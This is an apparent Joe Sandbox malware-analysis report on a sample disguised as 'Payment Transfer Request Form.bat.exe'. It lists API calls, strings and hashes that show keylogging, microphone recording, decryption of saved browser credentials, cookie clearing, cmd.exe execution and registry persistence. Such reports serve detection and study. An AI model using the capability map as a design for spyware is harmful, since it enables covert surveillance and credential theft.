                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 00446AB8
                                              Similarity
                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                              Similarity
                                              • API ID: _free
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                                              • __alloca_probe_16.LIBCMT ref: 0044E391
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                                              • __freea.LIBCMT ref: 0044E3FD
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                              • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                              • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                              • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                              • waveInStart.WINMM ref: 00401CDE
                                              Similarity
                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                              • _free.LIBCMT ref: 0044C59F
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                              • int.LIBCPMT ref: 0040FBE8
                                                • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                              • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
                                              • _free.LIBCMT ref: 004457E3
                                              • _free.LIBCMT ref: 0044580A
                                              • SetLastError.KERNEL32(00000000), ref: 00445817
                                              • SetLastError.KERNEL32(00000000), ref: 00445820
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              APIs
                                              • _free.LIBCMT ref: 0044DBB4
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 0044DBC6
                                              • _free.LIBCMT ref: 0044DBD8
                                              • _free.LIBCMT ref: 0044DBEA
                                              • _free.LIBCMT ref: 0044DBFC
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              APIs
                                              • _free.LIBCMT ref: 00441566
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 00441578
                                              • _free.LIBCMT ref: 0044158B
                                              • _free.LIBCMT ref: 0044159C
                                              • _free.LIBCMT ref: 004415AD
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              APIs
                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                              Similarity
                                              • API ID: Enum$InfoQueryValue
                                              • String ID: [regsplt]
                                              APIs
                                              • _strpbrk.LIBCMT ref: 0044B918
                                              • _free.LIBCMT ref: 0044BA35
                                                • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                                • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                                                • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                                              Similarity
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                              • String ID: *?$.
                                              Similarity
                                              • API ID: __alloca_probe_16__freea
                                              • String ID: H"G$H"GH"G
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 0040189E
                                              • ExitThread.KERNEL32 ref: 004018D6
                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                                                • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                              Similarity
                                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                              • String ID: 8:G
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe,00000104), ref: 00440975
                                              • _free.LIBCMT ref: 00440A40
                                              • _free.LIBCMT ref: 00440A4A
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                              • API String ID: 2506810119-390386176
                                              APIs
                                                • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                              • _wcslen.LIBCMT ref: 00419744
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                              • String ID: .exe$program files (x86)\$program files\
                                              • API String ID: 37874593-1203593143
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                                              • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                                              • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                                                • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CreateThread$LocalTimewsprintf
                                              • String ID: Offline Keylogger Started
                                              • API String ID: 465354869-4114347211
                                              APIs
                                                • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                                • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                                              • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                                              • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CreateThread$LocalTime$wsprintf
                                              • String ID: Online Keylogger Started
                                              • API String ID: 112202259-1258561607
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00404F61
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                              • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                                              Strings
                                              • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: Create$EventLocalThreadTime
                                              • String ID: Connection KeepAlive | Enabled | Timeout:
                                              • API String ID: 2532271599-507513762
                                              APIs
                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                              • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: CryptUnprotectData$crypt32
                                              • API String ID: 2574300362-2380590389
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                              • CloseHandle.KERNEL32(?), ref: 004051AA
                                              • SetEvent.KERNEL32(?), ref: 004051B9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseEventHandleObjectSingleWait
                                              • String ID: Connection Timeout
                                              • API String ID: 2055531096-499159329
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw
                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                              • API String ID: 2005118841-1866435925
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                              • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: origmsc
                                              • API String ID: 3677997916-68016026
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID: /C $cmd.exe$open
                                              • API String ID: 587946157-3896048727
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                              Strings
                                              • http\shell\open\command, xrefs: 00412026
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: http\shell\open\command
                                              • API String ID: 3677997916-1487954565
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                                • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                                • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                              • String ID: bad locale name
                                              • API String ID: 3628047217-1405518554
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                              • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: P0F
                                              • API String ID: 1818849710-3540264436
                                              APIs
                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                              • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: GetCursorInfo$User32.dll
                                              • API String ID: 1646373207-2714051624
                                              APIs
                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                              • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetLastInputInfo$User32.dll
                                              • API String ID: 2574300362-1519888992
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • API String ID: 1036877536-0
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                              • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Similarity
                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                              • API String ID: 3360349984-0
                                              APIs
                                              Strings
                                              • Cleared browsers logins and cookies., xrefs: 0040B036
                                              • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                              • API String ID: 3472027048-1236744412
                                              • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                              • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                              • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                              • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                              APIs
                                                • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                              • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQuerySleepValue
                                              • String ID: H"G$exepath$!G
                                              • API String ID: 4119054056-2148977334
                                              • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                              • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                              • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                              • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                              APIs
                                                • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                                • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                                • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                              • Sleep.KERNEL32(000001F4), ref: 0040955A
                                              • Sleep.KERNEL32(00000064), ref: 004095F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$ForegroundLength
                                              • String ID: [ $ ]
                                              • API String ID: 3309952895-93608704
                                              • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                              • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                              • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                              • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                              • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                              • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                              • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                              • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                              • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                              • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                              • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                              • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                              • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                              • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                                              • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleReadSize
                                              • String ID:
                                              • API String ID: 3919263394-0
                                              • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                              • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                              • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                              • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                                • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                              • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                              • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                              • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                              • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                              • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
